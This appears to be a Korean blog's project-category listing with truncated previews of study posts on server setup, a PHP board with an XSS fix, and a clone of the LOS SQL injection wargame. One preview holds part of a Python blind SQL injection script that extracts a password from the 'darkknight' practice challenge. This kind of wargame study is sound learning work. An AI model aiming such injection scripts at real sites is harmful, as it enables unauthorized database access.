일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
- 화학물질안전원
- 프로젝트
- UKPT level
- suninatas
- 여행
- MITRE ATT&CK
- 국가정보원
- 연구모임
- Service
- PHP
- 경기팀
- 화학물질
- 국정원
- 국가기록원
- 불법유통
- 기타정보
- 도구모음
- UKPT
- nurisec
- 12기
- 정보보안
- Los
- 파이썬
- webhacking
- codeup
- 불법유통근절
- 웹 해킹 입문
- 화학물질불법유통온라인감시단
- HTML
- 대외활동
- Today
- Total
목록프로젝트 (9)
agencies
보호되어 있는 글입니다.
이번시간에는 지금까지 발생했던 문제들을 해결하는 내용을 가지고 있습니다. 1. 네트워크 연결이 되지 않음 가상머신에서 장치 > 네트워크 > 네트워크 설정을 클릭합니다. 케이블 연결됨 부분에 체크가 되어 있지 않아 3시간 이상을 삽질했었습니다... 2. mysql 한글 출력 패스워드를 한글로 설정하는 문제를 제작하고 있었습니다. update user_table set pass='방첩사령부' where user='dcc'; 의 쿼리문으로 깨진 한글을 수정하였습니다. 추가로 alert table user_table convert to character set utf8mb4;도 했습니다. 3. mysql 한글 출력(2) 분명 패스워드가 나와야 하는데... 깨져서 나오는 것 같습니다. mysql 접속을 하는 부분..
LOS의 문제 내용입니다. darkknight 이며, 문제풀이 내용은 아래와 같습니다. import requests as r url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?no=1%20or%20id%20like%20reverse(%22nimda%22)%20and%20" i=8 flag = "" #패스워드 검사 for j in range(1,i+1): for k in range(ord('0'), ord('z')): p = "ord(mid(pw,{0},1))like {1}%23".format(j,k) res = r.get(url+p,cookies={"PHPSESSID":"vgjb9eaaankiq042bvju..
rubiya 멘토님께서 화이팅이라고 말씀하셔서... 프로젝트로 LOS 따라하기를 진행하고자 합니다. 홈페이지 프로젝트는 ... 대ㄱ 1. 가상머신 우분투 구축 2. apache / php / sql 설치 및 연동 3. LOS 문제풀이 및 동일한 내용으로 구축하기 https://los.rubiya.kr/gate.php https://los.rubiya.kr/gate.php los.rubiya.kr 위 사이트는 진품 LOS 사이트입니다. 위 사이트는 가품 LOS 사이트입니다. SQL-4 를 확인해보겠습니다. 문제 페이지 이미지 실제 서버 이미지 이런 .. 테이블을 분리하지 않았더니 기존에 있던 admin과 섞이게 되었습니다 ㅠㅠ user 이름을 수정해야겠습니다. ( newadmin으로 수정했습니다.) imp..
소스코드 index.php 소식ㆍ정보 > 정보게시판 정보게시판 ID : PW : login.php
를 입력하면 위와같이 xss가 발동된다. 이를 해결하고자 htmlspecialchars() 함수를 이용했다. $sub = htmlspecialchars($_POST["subject"]); $user = htmlspecialchars($_POST["user"]); $comm = htmlspecialchars($_POST["comm"]); 검색바 부분을 추가했다. mysql 검색 부분도 기존에는 id값만 order by desc로 했었는데 if ~ else 구문을 주어 GET방식으로 search에 값이 있을 경우 다음과 같이 데이터베이스에서 조회를 한다.
1. index 2. view 3. write 4. write_chk 오늘은 이렇게 총 4개의 페이지를 제작하였습니다. 우선 index는 데이터베이스에 저장되어 있는 게시물을 모두 가져와서 보여주는 형식을 가지고 있습니다. 제목을 클릭하면 해당 게시물의 내용을 볼 수 있습니다. 이것은 view.php로 이동합니다. 글쓰기 버튼을 클릭하면 write.php 로 이동합니다. 등록 버튼을 누르면 write_chk.php로 이동하며 이것은 데이터베이스에 내용을 직접 삽입하는 행위를 합니다. 소스코드 index.php 소식ㆍ정보 > 공지사항 공지사항 번호제목작성자날짜 글쓰기 데이터베이스가 있는지 확인하고 없다면 데이터베이스 board를 생성합니다. 테이블도 마찬가지로 존재하지 않으면 board 테이블을 생성합니다..
https://dev.mysql.com/downloads/installer/ MySQL :: Download MySQL Installer Note: MySQL 8.0 is the final series with MySQL Installer. As of MySQL 8.1, use a MySQL product's MSI or Zip archive for installation. MySQL Server 8.1 and higher also bundle MySQL Configurator, a tool that helps configure MySQL Server. dev.mysql.com 위 사이트에서 다운로드를 합니다. Execute 버튼을 클릭합니다. Next 버튼을 쭉 누릅니다. 비밀번호를 설정합니다. 저는 ..
https://www.apachefriends.org/ XAMPP Installers and Downloads for Apache Friends What is XAMPP? XAMPP is the most popular PHP development environment XAMPP is a completely free, easy to install Apache distribution containing MariaDB, PHP, and Perl. The XAMPP open source package has been set up to be incredibly easy to install and to us www.apachefriends.org XAMPP를 설치합니다. 파일은 위 링크를 클릭해서 다운로드를 받을 ..